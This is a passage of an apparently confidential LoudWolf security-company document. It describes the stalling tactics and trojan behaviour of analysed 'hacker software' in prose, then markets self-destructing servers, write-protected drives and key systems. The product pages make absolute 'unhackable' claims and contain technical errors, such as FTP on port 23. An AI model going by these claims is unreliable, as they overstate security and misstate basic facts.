__________________________________________________________________________________________________
ANALYSIS OF HACKER SOFTWARE - Continued
Error Messages: & Other Time Gainers
“BAD DISK”
The file NTLDR Is missing or corrupt, please replace this file and reboot the system.
The file NTOSKERNEL. DLL is missing or corrupt, please replace this file and reboot the system.
The file HAL. DLL is missing or corrupt, please replace this file and reboot the system.
The file NTDLL. DLL is missing or corrupt, please replace this file and reboot the system.
(Stone Walling and Obfuscations)
The system is operating in 16 bit video mode, as part of a test by Microsoft Inc. This software has been
optimized for performance in 16 bit video mode.
As part of a test, Information Interchange Service is now installed and configured with a personal web server
demonstration suite of programs. An FTP server is configured to support this testing effort.
The file NTDLL. DLL is missing or corrupt, please replace this file and reboot the system.
The boot. ini file is corrupt booting from C:\WINNT
The system is shutting down by the authority of the NT AUTHORITY :SYSTEM
The system is shutting down in 60 Seconds:
SORRY YOU ARE TOAST, WITHOUT ADMISSION OF RESPONSIBILTY
ALL OUT WAR, YOU ARE GOING DOWN!
AND STAY DOWN!
CONFIDENTIAL
Page 63 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
ANALYSIS OF HACKER SOFTWARE - Continued
Other noted Trojan functionality
Unattended Time
The Software can interrogate the time of day from the local computer and make immediate assumptions as
to when the system would be most likely to be unattended and therefore able to risk taking advantage of
greater portions of the available Internet bandwidth and to perform highly “visible” operations such as restarting the computer (which is occasionally necessary in order to replace an active operating system file with
a usurped version) or otherwise performing functions which would severely affect the normal performance of
the system or produce obvious indications of uncalled for activity such as engaging in large scale hard disk
access. These more visible operations are scheduled for late night initially, thereafter a log is kept on the
actual usage patterns for that particular system and adjustments are made accordingly. (See also physical
location)
Physical Location Determination
The question of why the software goes to such lengths as to find out the physical location of the attacked
system is, as yet, unclear to us save for the obvious verification that the attacked system’s physical location
“jives” with its self-reported location as yet another guard against hacker entrapment. Nevertheless, the
system determines its physical location in a number of different ways:
By picking off the local address entered into various well-known application programs such as Outlook, United
parcel Service-tracking systems etc.
The software can pick out the local address by means of tapping into a users internet session and recognizing
the Prompts or Meta Tags “Address” and so on. In these days of online ordering and online help, hardly a
week goes by before some web site makes my address a “required field” for some such service or
information.
Phone Number Lookup
Even easier than picking out addresses, the phone number is reported by the local software
all over the place. Applications, the modem and the system fax all record, in unencrypted
form, the full telephone number. An Internet lookup reveals the city, the yellow pages, will
narrow it down to the neighborhood.
CONFIDENTIAL
Page 64 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
LoudWolf Solutions
Products Overview 1 of 4
The following pages contain a brief description of some of our products. A more detailed description of the
products and the threats they address can be found on the page referenced after each description:
Sentinel
This product is a hardware and software PC add-on product. It is a monitoring and action decision
system. It constantly monitors a number of sensors and if the sensors flag a problem, then the
Sentinel will take actions based on a set of fixed read only rules. The actions it takes could range
between stopping access to an interface, i.e. serial, network or the complete shutdown of the
machine. [For further information see page:
]
Sentinel Platinum
This product uses the Sentinel product as a base, but has the added advanced functionality to be able
to monitor wireless interfaces. This is deemed as an advanced product as the wireless environment is
less secure and more open to attack. [For further information see page:
]
Sentinel Sharp
This is an add-on product to the Sentinel and Hot Rod Products. It addresses the issue with advanced
security monitoring systems is to be able to administer them. Any administration can not be carried
out via any operating system software, as it leads it self to hacking, and thus negates the whole
security implementation. Sentinel Sharp is a small touch sensitive 4”x3” black and white LCD
system that controls the Sentinel system via a serial interface. It does not have any methods by which
it can be controlled other than its touch sensitive screen, and thus not hack able. [For further
information see page:
]
Sentinel Avenger
Sentinel Avenger, is biased on the Sentinel product, It allows for trusted processes to be monitored,
if a threat is perceived, then a set of rules determines associated actions. These actions are based on a
set of fixed read only rules. The actions it takes could range between stopping access to an interface,
i.e. serial, network or the complete shutdown of the machine. [For further information see page:
]
Sentinel Avenger Upgrade
Subscription service product for Sentinel Avenger, i.e. to add more trusted process definitions, in
much the same way virus definitions are made available on subscription. [For further information
see page:
]
CONFIDENTIAL
Page 65 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
Products Overview 2 of 4
Hewlett Packard Sentinel
This is a special project to meet a requirement from HP, and consists of a hardware and software
secure authenticating system. They require a way of trusting particular machines. It is based on some
of the underlying ideas of the ‘SuperKey’ Technology. However it has a set of keys that are accessed
in a numerical list. Trust is granted by the device being asked for the value of a particular key, i.e.
what does key 173 hold? If the result is the same as the machine asking then trust is granted. It also
generates PGP Public/Private keys using the results from the key database. This external device is
connected to the machine via a serial interface. [For further information see page:
]
Rixa STEEL -XA
Aimed at commercial, government or military organizations that require the ultimate in data
protection. This server product will even go as far as destroying the physical medium holding the
data, if a high enough risk is perceived. The Rixa STEEL is an integration of most of the other
technologies mentioned here, but with a number added features, making a highly secure system. The
system configuration can range from a simple single server to a server farm. The machines use a
novel ‘Tri Level Operating System’, this uses three independently written operating systems each
with 100 modules. At boot a random selection of the required modules is loaded to produce the
operating system. This lends its self to be totally unpredictable, thus near impossible to hack a
particular module. The system is self checking, to the point of even checking low level hardware
operations on the motherboard and thus highly integrated. If an attack is sensed then a hard coded
decision is made of what action is to be taken, which could range between stopping access to an
interface, i.e. serial, network or the complete shutdown of the machine and destruction of the hard
drives. The system also implements a method by which it only sends or receives a packet, it does not
reply by default to any incoming packet, which normal networking does. This stops information
leak, such as informing which type of web server is being used, or any other server version leakage,
or any information which could lead to discovery of what the server is to the hacker. An intelligent
denial of service system is also incorporated, this stops an attack that manages to take one machine
down from taking any other in the farm down. [For further information see page:
]
Sharp STEEL
As with the ‘Sentinel Sharp’ this is the same type of product but developed for the ‘Rixa STEEL’
Systems. [For further information see page:
]
HVIP Drive
Aimed at the OEM market, for organizations that require the ability to destroy the physical disk
medium holding the data. The HVIP drive is a ‘High Value Intellectual Property’ Drive. The idea of
this disk drive is to physically protect the data from being read, i.e. Removal of the platters from the
drive, so they can be read on another drive/test rig. It can ‘near instantly’ destroy the physical
medium of the data on the plates. Leaving a resulting goo. The drive has built in intelligence by
which it decides when to carry out the securing action, i.e. case breach and power down. [For further
information see page:
]
CONFIDENTIAL
Page 66 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
Products Overview 3 of 4
SuperKey
This is a software based product, and could be used on any system that requires this type of
authentication, from ‘Set Top Boxes’ to Satellite communications devices. SuperKey is a security
system that absolutely identifies a particular machine or device. It is not a system for identifying a
user. It does not use any password or certificate technology. It is based on a Shared Secrets, these
secrets are built up by the authenticating process, such things as the fan speed at a particular time,
the difference between the PCs clock and GMT, or the serial number of a piece of
software/hardware. Such technology might be used in set top boxes, to ensure the box receiving the
data (movie) is trusted. [For further information see page:
]
Avenger Pro
This software security product is aimed at the commercial, government, military and home PC
markets. Avenger Pro, Is an anti-virus, and process trust software solution. It not only enables virus
protection, but it also ensures that processes that are running on your PC are known and trusted. The
‘normal’ updates from the internet will be needed to ensure its definitions are up to date, thus, the
SuperKey technology is also incorporated, so that any virus/process definitions are from a trusted
source. This stops hackers from spoofing anti-virus definition download sites. The SuperKey
technology embedded into this software could also be used by third party software vendors to
authenticate that where you are downloading from is valid. For this to occur, a module is also
required on the third party site to implement the server side of the key trust mechanism. [For further
information see page:
]
Avenger Platinum
Avenger Platinum has the same base functionally as the Pro product with the addition of a hardware
interface to the Sentinel product. This allows any un-trusted event to cause an action to be taken
dependant on the severity of it. As with the Sentinel product the rules are hard coded and can not be
changed, thus not hack able. The actions it takes could range between stopping access to an
interface, i.e. serial, network or the complete shutdown of the machine. [For further information see
page:
]
Hot ROD (Read Only Drive)
This secure disk drive product is aimed at either the OEM market or as an after market product, it
could also be licensed out to drive manufactures. The ‘Hot Rod’ set of products are all based around
the same low level hardware. This hardware consists of a disk drive which has a form of write
protect. The write protect is implemented via a hardware switch on the front panel of the computer.
The amount of the drive that is to be protected can also be selected by a physical switch. These
options are not able to be changed via software as it would open it to being hacked, and thus useless.
LoudWolf Plans variations of this product including; 50,100,150,250 & 500 Gigabyte capacity
drives. [For further information see page:
]
Dual Hot ROD
This hard disk security product would be mainly aimed at the military, as they require this type of
fault tolerant disk coupling. This product is a very tight form of mirroring, there are two drives very
tightly coupled. One is the exact mirror of the other. If one fails the other continues to operate. They
are not Hot swappable, and thus repair requires replacement of both. [For further information see
page:
]
CONFIDENTIAL
Page 67 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
Products Overview 4 of 4
Hot ROD Raid
As the ‘Dual Hot ROD’ product is aimed at the military market, this is aimed at commercial market,
where easily administrable fault tolerant disk arrays are required.
To allow raid functionality, i.e. Hot swap, and then the subsequent re-syncing, which requires a
much more complex solution than the ‘Dual Hot ROD’ as ‘non writeable’ data has to be written. The
solution is to have a complete sub system that runs independent to the main computer, with its own
raid control functionality. [For further information see page:
]
Silicon Server
The ‘Silicon Server’ is a hardware and software secure server solution. It is aimed at organizations
that require secure non-changing or very infrequent changing content scenario, such at web servers,
image servers. The secure content will be held in a medium that is only writable by physical access
to the server. This would operate in the same way as the ‘Hot Rod’ product a physical switch will
have to be operated to allow write access to the secure ‘read only’ areas. Initially the server would
use the ‘Hot Rod’ family of products, but it is also being considered an upgrade path to a fully
silicon (solid state) drive which would yield a much higher performance. [For further information
see page:
]
CONFIDENTIAL
Page 68 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
Rixa STEEL-XA Secure servers for high value Intellectual Property.
“The Rixa STEEL system is designed to
provide 100% protection for the high-value
intellectual property it contains while at the
same time providing 99.999% uptime for the
customers it serves.”
These two goals are met by the interaction of a suite of technologies which, when considered as a system,
create a logical and harmonious relationship between these two opposing forces.
DESIGN AXIOMS:
Prevention of “Catastrophic” Intellectual Property (IP) loss is
the overriding concern and takes precedence over all other
factors, including continuity of service.
All other systems rely on the “antiviral approach” to system
integrity, allowing all data in and blocking that which is
recognized as harmful. Rixa takes the opposite approach, we
allow nothing in unless it is certified as non-harmful.
Bullet point features:

12-way self-checking software system with a simple and rugged design philosophy.

Unhackable hardware override of all software systems.

Last resort, ultimate peril, total destruction of the hard disk drive by means of a high-speed
chemical reagent.

One-way inputs and outputs for all data transfer (Zero information leakage.)

No execution of external code within the server whatsoever, input buffers checked via hardware
for “no harm” validity.

High reliability components with active thermal controlled environments.

Prevention of multiple successful attacks by shared data “watcher” system.

Unknown software configuration due to on-power-up self-configuration.

Super-Key system with zero knowledge key spans.

Zero knowledge previously-shared secret technology.

Smart sensor technology with weighted threat analysis all in hardware.

Designed and built in the open – right in the face of, and despite, those who would see this
technology buried. Pre-tested!
CONFIDENTIAL
Page 69 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
Rixa STEEL-XA Product Description
The Rixa STEEL-XA Concept
The sensor and checking systems described are formidable when considered as an integrated system, the
erasure response is a requirement for the 100% goal as can plainly be seen. However, not all threats are
considered equal. There are two stages to an alert dependant on the severity of the threat, namely a caution
cut-off closedown, which is locally reversible and full erasure, which requires a more elaborate recovery
procedure.
Caution cut-off closedown Recovery
The caution cut-off closedown of a Rixa server is generated by any failure of the watcher systems to filter a
non standard request for intellectual property. As a precaution, any imperfect request for service will close off
the Rixa server by means of a hardware cut-off that effectively isolates the server from all connections. An
electronic, “pair of scissors” cuts both the input and output data ports to the server. Recovery consists of a
three-way re-authorization from the local security officer, a one-time ‘Super-key’ code from DA (issued only
after data from the watcher has been verified) and another ‘Super-key’ from the local watcher (Verified by
the watcher network.)
Full Erasure Recovery
A more complex arrangement that requires the complete restore of the intellectual property that has been
erased beyond all possible recovery by the Rixa STEEL protection systems. In this case, the restore procedure
requires the installation of a new factory prepared hard disk drive, along with an elaborate re-start procedure.
The Innards of a prototype hard disk
complete erasure system. Top Right is a
solenoid which is prevented from breaking
a glass ampoule (Right Edge) by the
constant reminders NOT to self destruct
from the tri-Level software system and the
Heart Beat system, other sensors in the
Rixa STEEL chassis add an extra level of
protection preventing the removal of the
drive without triggering a self destruct
event.
CONFIDENTIAL
Page 70 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
Rixa STEEL-XA Product Description
Installation Security
The Rixa Server will only power up one time, ever. The drives containing the protected property are selfprotecting from the beginning and they remain self-protecting until either a failed attack or a hardware failure
terminates their duty.
The drive core is the last line of defense and is treated with the same “overkill” philosophy as the rest of the
Rixa STEEL system. The drive will self-configure its own cryptographic Super-Keys and is incapable of
divulging them since it itself does not know what the keys are! The same is true of the software
configuration, which is determined on power up by a quantum noise generated random key, which is then
automatically overwritten by the software it configures. Immediately after the software starts, the Server is
configured yes, but with what configuration? The server itself knows not, nor do we! If a situation should
ever occur where the customer loses the original, we cannot help.
The main hardware micro
controller behind many of our
products, Including Sentinel,
RIXA STEEL, Sharp, HOT-ROD
and RIXA- XA systems. The
device is fairly flexible and may
be adapted to many products
easily. This device is able query
sensors, to cut connections,
isolate hard drives, analyze
incoming data requests, verify
software integrity and even
destroy the hard drives
physically. Of course it is itself
NOT programmable or hack-able.
PERIOD.
Internal Security at LoudWolf
Incoming raw or encrypted data must be physically secured by, and for, the satisfaction of the customer. We
take full responsibility only when the property is transferred to our secure drives. And once there, as you
have already guessed, we are not too worried about it! The system allows for the protected property to be
loaded at the client’s site. In this case LW takes on responsibility for the IP at the moment that the safety
devices are removed and the protection system is armed.
Port Level Security
The first step for any hacker is to locate the system they are trying to hack. Probes and IP scanners can
determine if a server is on and what ports are active on the server. The Rixa server has only one input that
only listens and never replies and one output that only sends and never receives. It is incapable of giving
feedback to probes. What happens when you “Ping” a RIXA server? Nothing… Silence… Like it was not even
there!
Service Level Security
The Second step for the hacker is to find out what kind of system you are trying to hack. Probes are used to
ID the system to determine what the operating system is and what programs and services may be running on
the target system. For example if the hacker tries an anonymous Log-In on FTP port 23 a typical; server may
reply “Access denied: Microsoft FTP IIS 5.0 “ Then they can try a known vulnerability targeted to that
program. This is termed “Information leakage” The Rixa STEEL system reveals nothing of its internal
structure to probes since all “information leakage” has been compiled out of its operating systems.
CONFIDENTIAL
Page 71 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
Rixa STEEL-XA Product Description
Configuration Security
The Rixa STEEL approach to configuration security is to make it nothing less than impossible to know how
any particular server is configured. Knowing the configuration and hoping to keep the secret safe is not good
enough. The goal in configuration security is similar to the problem faced by the designers of the U.S.
President’s, “launch code.” How do you develop something in such a way as to be totally secure-even from
an “insider?” The Rixa STEEL operating system is in fact three custom operating systems running
concurrently. The operating systems are each compiled by LoudWolf engineers in concise modules, one
hundred modules per operating system. These modules are designed to be interchangeable. Each operating
system is developed by separate programming team at LoudWolf. Each team produces as part of their design
specifications 100 different variations of their modules.
When a Rixa STEEL server is installed the server self configures its software by randomly selecting the
modules to form its operating system. Nobody can know just which combination of 100 x 100 x 100 or one
million possibilities was selected. In short, just what is running on a particular server is not known by
anyone. Even us!
Operating System Integrity
Rixa STEEL operating system is a hybrid of three custom operating systems and a custom hardware circuit.
The Rixa hardware checks the software heuristically in over 100 ways, including a byte for byte comparison
with non-volatile read-only media, while the tri-level software checks itself and the hardware constantly. Rixa
tri-level software will shut down a 200-nanosecond hardware fuse on all inputs and outputs if anything other
than 12-way perfection is not verified. Or if even one bit of input data is not as it should be.
Physical Security
The Rixa STEEL server is fail-safe. Any failure including power failure, physical damage or indeed any unusual
circumstance will by default, inevitably and without further action prevent the IP theft by taking the IP OffLine or, in the worst case, erasing the IP completely, and on our military version, brutally. Rixa software and
hardware checking acts as a restraint mechanism that holds back the erasure of the high value IP. This
erasure process will activate using fundamental forces if not prevented from doing so by a perfectly
functioning Rixa security system.
Hardware beats software.
The custom hardware is an important concept in the overall Rixa methodology. At LoudWolf we say,
“scissors beats software any day!” Akin to the rock paper scissors game we played as children, it is an
overriding truth that if I cut the wire you will not be able to pass a signal though it. Similarly, the hardware,
since it contains no microprocessor, no memory and therefore is not programmable or hack-able, adds an
overriding non-software layer of security. Nevertheless, in order to protect it must be running. Just as the
software cross checks the other two layers of software. Each of the three layers of software cross check the
hardware. Just as the hardware is measuring digital and analog signals generated by the software, the
software is in turn taking note of the hardware health by constant monitoring of the heartbeat and other
“heath signals.”
CONFIDENTIAL
Page 72 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
Rixa STEEL-XA Product Description
Heartbeat Detail
The heartbeat in a complex electronic waveform generated by the hardware. It consists of a complex
interplay of several signal sources. Most basic is a “carrier frequency” which can vary in the ultrasonic range
from 25 to 45 Kilohertz. Superimposed upon this carrier frequency is an amplitude-modulated signal that
consists of a variable mark-space ratio data with a periodicity, which can vary from 10 microseconds to up to
half a second in ten microsecond increments. The periodic measurement by the software of this complex
hardware signal produces variables by which the software verifies that the hardware functioning correctly and
therefore the system is fully protected.
In turn, it is the software itself which determines the hardware’s carrier frequency, mark–space ratio and data
stream. Thus creating a circle of software-hardware interaction that ensures that both the hardware and
software are fully functional and the system is completely secure. Should the hardware detect any slight
variance in the subtle “music” of the generated heartbeat, as would be caused by the slightest variation in
the software functions, it will trigger an alert. Similarly, should the hardware fail to accurately produce its
own complex “music” the software will trigger an alert.
Carrier frequency 25-45 KHz
Mark-Space ratio 10 uS-500 mS
Data Stream 8 x 8 bit bytes = 64 bits
In a “tour de force” of convoluted logic, our scientist boffins derive the base seed numbers that determine
the frequency pattern of the heartbeat from an integration of the data derived by the hardware’s current
status! A house of cards indeed, but an exquisitely sensitive system is, after all, what we are after.
Watcher Functionality Overview
The “Watcher” system is a separate component of the overall Rixa STEEL server. It can be viewed as a
firewall system, in that it functions as a filter in front of the main server and prevents “bad” data packets
from being forwarded to the server by only allowing known good packets through.
The “normal” operation of the watcher is to validate incoming data packets. However, the watcher also
performs two other essential functions.
Co-ordinate the sharing of watcher network bad data lists and verify the integrity of the list data. Verify the
health of the other watchers on the private watcher network.
Monitor the health of its attached Rixa STEEL server and co-ordinate notification and recovery procedures in
the event of any failure.
The watcher system is kept separate from the Rixa STEEL servers, since it is essential that the watchers
perform their duties as reporters and coordinators of the “post mortem” data in the event of a Rixa STEEL
SECURITY CLOSEDOWN or an EMERGENCY PROTECTION event.
The Watcher system itself incorporates many of the security features of the Rixa STEEL system and its
software is similarly configured, although since the watcher systems are not holding any protected intellectual
property, they do not incorporate the security closedown and protected property erasure systems.
CONFIDENTIAL
Page 73 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
Rixa STEEL-XA Product Description Variants & Options
MILITARY SERVERS
High Security Military and governmental secure servers:
Naturally, our military variant combines all of DA’ s core technologies to form a “flagship” product.
The Rixa STEEL-XA secures the Protected Intellectual Property (PIP) from all possible forms of theft.
Considered in the design are the possibilities of electronic theft, physical possession (through force or
otherwise) and accidental exposure to physical possession.
The design calls for absolute confidence in the total destruction of the protected intellectual property in the
case of unauthorized physical possession of the system.
Built in to the system is the concept of fail-safe protection from all unauthorized electronic access to the
protected data.
FEATURES:
Tri-Level software.
Full physical sensor array.
HPIV drives
Hot ROD system data integrity
protection.
SuperKey cryptography
Watcher subsystem
Sentinel Sharp security interface
Sentinel Avenger Pro control
software
Silicon Server hardware data storage
CONFIDENTIAL
Page 74 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
Rixa STEEL-XA Product Description Variants & Options
COMMERCIAL SERVERS
RIXA Commercial high value Intellectual property servers
The emphasis for our commercial clients, though security is no less crucial than our military
customers is on electronic protection with de-emphasis on physical security. The design paradigm
requires us to allow for the possibility that the protected property could, at times, be the only or most
up-to-date copy.
The system is priced less costly than our high-end military systems at least at the base level. The system
allows for incremental upgrades to security. And it also supports a subscription based “monitoring” service for
our corporate clients.
FEATURES:
Tri-Level software.
Corporate selected physical sensor array.
Hardware protected connectivity
Hot ROD system data integrity protection.
SuperKey cryptography
Watcher subsystem
Sentinel Sharp security interface
Sentinel Avenger Pro control software
Silicon Server hardware data storage
Commercial Systems Function Definition
The industrial version of the Rixa STEEL security system draws its
technology from our military systems with design modifications
suitable to accommodate non-military requirements, for example:
We must accommodate the possibility that the protected intellectual
property is, at times, the only up to date copy. The Rixa STEEL
security system in its industrial version lacks the chemical erasure
system and a full complement of sensors. Nevertheless, with the
exception of physical possession by force, the Rixa STEEL security
system affords military-grade security for the industrial consumer.
Supplementing the tri-level software system is a heuristic system
that calculates signatures for all system files and takes electronic
isolation protective measures in the event that any anomaly is
detected. Therefore, the security system acts very quickly, cutting
off all internet access by means of hardware switches preventing
data loss from the moment the slightest suspicion is aroused.
Signature checking is hardware based, it cannot be “spoofed” or faked by malicious software. Also,
since the isolation system is fail-safe hardware, it cannot be prevented from taking action nor have
that action reversed by software. Upon alert, the Rixa STEEL system using hardware alone can
instantly isolate the protected data from all communications channels yet it remains capable of calling
out for assistance by phone, radio and internet.
CONFIDENTIAL
Page 75 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
Rixa STEEL-XA Product Description Variants & Options
Above is a graphical representation of the typical RIXA STEEL system. The Military, Industrial and
Consumer applications can all be described by elements of this diagram.
 For the Military applications, the non-mobile base secure data server is represented by all aspects of
the preceding diagram.
 For mobile military applications; Submarines, Tanks, Tactical units etc. The diagram is complete with
the exception of the watcher network, which is impractical and insecure for mobile units.
 For the industrial applications, the diagram is identical with the deletion of the “kill” arrows, as the
industrial application presumes physical security and assumes that the protected data may be the sole
copy.
 For the consumer applications, the diagram is to be considered without the watcher network and the
chemical erasure system. Also the tri-level software system runs “on top” of a commercial operating
system.
CONFIDENTIAL
Page 76 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
Rixa STEEL-XA Product Description Variants & Options
Consumer Systems Overall issues.
Our offerings to the consumer are, of course derived from the high end products though not all of
the features inherent in our high end systems can be converted for the consumer level requirements.
The marketing emphasis for our consumer products is to provide a dramatic increase in confidence in the
privacy of their data. Due to our sophisticated detection and alarm systems. We have noted that there is an
aspect of “pride of ownership” that also plays a part in consumer demand.
For the consumer products we eliminate the tri-level software system, for this is not an intellectual
property server but a general-purpose computer running a popular operating system and various
application programs. As such, it is difficult to secure yet maintain the flexibility expected by the
average user. Nevertheless, utilizing our hardware signature system to ensure the integrity of the
key operating system files, the possibility of compromise by a virus, a Trojan horse program or spyware is eliminated.
In concert with the computer manufacturer and/or the microprocessor manufacturer, we would hope
to achieve a tight integration of the computer core hardware with LoudWolf electronics. It is possible
and preferable that the LoudWolf security electronics be incorporated beside the so-called support
chips, which are manufactured by the microprocessor companies themselves and typically ship-with
the microprocessor. We believe that companies such as Intel, Via and AMD would be intrigued by
this possibility, since a relationship with LoudWolf would enable one or the other to claim that
computers based upon their microprocessor are “more secure” than their competitors.
Such a partnership would enable LoudWolf to integrate our technology closely to the microprocessor frontside and PCI bus and would enable the security system to afford the consumer total protection.
The consumer version also can be configured to analyze and respond to a number of sensors and or modes
of operation that go some way towards emulating the modular-sensor array of our military version. Examples
of such sensors which are accessible and generally built in to modern day computers are: microphone,
infrared device, radio frequency receivers, forensic RF via USB and (IEEE1394) protocols, power profile
analysis, user schedule profile, typing signature, temperature profile, application profile, usage patterns etc..
CONFIDENTIAL
Page 77 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
Rixa STEEL-XA Product Description Variants & Options
Main Server “STEEL” Standard Equipment
The main server is a high speed Pentium IV based computer. It is currently designed around the Intel
motherboard, though the choice of motherboard and processor is unimportant to the system as a whole. The
specifications of the standard portion of the server are as follows, though, once again, the hardware selection
for the standard portions of the system are somewhat arbitrary.

Intel Pentium IV Processor with 4.0 GHz clock speed/800 MHz FSB speed.

2 GB RAM consisting of four banks of 512K double-sided RIMM Direct RAMBUS PC-800B
compliant Serial presence detect with Error Check Correction.

VGA card.

Dual-channel Gigabit I/0 card.

Data storage hard disk drives: up to 10 drives @ 120 Gigabytes for a total of 1.2 Terabytes of
data.

Main Server STEEL Custom equipment.

Solid 3mm-thick hermetically sealed aluminum case, with a single triple-sealed input port for
12V power input.

Three triple-sealed optical windows for optical connection to the input, output, and video
monitor.

Power Inverter unit: 12V DC in with outputs for +5V, +12V, –12V, and 120V AC.

Battery-backed-up un-interruptible power supply: 120V input – 120V output.

System loaded at factory. Does not require any form of floppy disk drive or CD-ROM.

Custom sensor package: (As needed)

Heartbeat generator.

Quantum random number generator (Built in to the Pentium 4 processor system).

Analog measurement package: 16 bit, 16 channels.

Digital monitoring package: 16 inputs.

CPU monitoring package: 80 inputs.

Closedown package:

Two channel optical interrupter system (Fail Safe)

Optical Fault indicator system Via VGA port.

Passive Ultra Capacitor discharge/Coil Array disk erasure system (up to ten units).

Caution restore magnetic key sensor array.

Liquid cooling system with case mounted heat sinks.

Nitrogen atmosphere circulation system.

Temperature control, monitoring and alarm system.
CONFIDENTIAL
Page 78 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
Super-Keys Product description
The Super Key system is integrated into a number of our products. It is an integral part of the hardware and
software components that make up the bulk of our offerings. The Super Key is also a “stand alone”
technology that addresses many of the cryptographic problems we face today.
The Problem.
As has been stated time and again in this document. The security of the Cryptographic keys is the weakest
link in any secure system thus systems are only as secure as the keys that are designed to allow legitimate
access to them. For the benefit of the reader, we will describe the current state-of-the-art and with this as
the backdrop, we will describe an approach that is designed to overcome the current limitations.
Cryptography, or the process of encrypting computer communications, is a complex subject. Moreover, it is
essential to understand the importance of keys or passwords in the context of data encryption. To
understand our approach to encryption as incorporated into our products, it is necessary to delve a little into
the complexities of cryptography.
When we consider encrypting data, we must strike a three-way balance:
1. What is the value of the data and the consequence of its loss?
2. What is the cost of encryption in terms of computer performance IT costs?
3. What degree of encryption is appropriate to deter the potential data thief?
Security Encryption Today
Security professionals routinely make these decisions based upon arbitrary “rules-of-thumb” or “best
practices.” Data encryption is not routinely implemented because encrypting data is associated with various
costs. Extra computing power is needed to encrypt outgoing data and still more to decrypt inbound data. In
some cases, the data is pre-encrypted and stored separately from the original requiring additional disk space.
Most importantly, the protection of the encryption keys poses a significant problem, as we will see.
Every-day Security
Inconsequential or low value data traffic is generally not encrypted at all to preserve the performance of the
entire system. Private data with intrinsic value is generally protected with weak encryption and high-value
intellectual property such as; High resolution digital masters of block-buster movies, military targeting
information, battle plans and military hardware design documents is protected with the strongest encryption
available.
Vital Security
Any data that, if lost, would result in a catastrophic and permanent loss is now considered unsafe to store on
any connected computer. Irrespective of the encryption or security systems installed. These classes of data
are rarely, if ever, stored on any computer system that is connected to any form of communications network.
Unbreakable security – Isn’t
A fundamental axiom known to all security experts is that data encryption, however complex and difficult to
break, is never impossible to crack. The very best encryption techniques serve only to make the task of
decoding the message more expensive and difficult. Top grade military security encryption, despite the
claims of some suppliers, can only hope to achieve the goal of making the decoding of the communication so
prohibitively expensive and time-consuming so as to make the effort not worth the trouble.
CONFIDENTIAL
Page 79 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
Super-Keys Product description
The Best Encryption Available
The top-of-the-line data encryption vendors tout their systems aggressively, using the strongest of
superlatives. However, it is worthy of note that never do these vendors claim their cryptographic systems to
be unbreakable. The boldest claim we have seen from such vendors is the phrase “computationally
infeasible.” The implication of this phrase is that a potential data thief would be forced to use the fastest and
largest computers available and commit an inordinate amount of computer time in order to compromise the
encryption. We do not dispute these claims. Strong cryptography, properly implemented is very hard to
crack… today.
The LoudWolf Way
LoudWolf makes the assertion that what was “computationally infeasible” last year is quite feasible this year
and thereafter becomes more and more trivial.
Our second assertion is simply this: A data thief when faced with a properly implemented and strongly
encrypted target has three choices:
1/ Commit computational power and expense to crack the cryptography.
2/ Give up the task and look for an easier target.
3/ Steal the key!
In our research we have noted that 99% of all data theft today uses the third option. Gaining access to the
encrypting computer is considered easy, just as easy as finding another target! There are hundreds of
known methods, with more being discovered every day. It has become trivial to tap in to any computer
system connected to the web and install a “key-logger,” effectively lifting off all the keys and passwords at
the source--in some cases even as they are typed.
In summary, encryption is always breakable. Better encryption takes longer to break, but it is always
breakable. The best encryption strives not to be unbreakable but to make the breaking uneconomical. All
encryption is worthless it the keys can be stolen.
Encryption using long keys is desirable provided that the computational power required to encrypt the data is
consistent with the volume of traffic and the expense involved. During our research into the delivery of highvalue intellectual property, we performed an in-depth analysis of all possible encryption techniques. Our
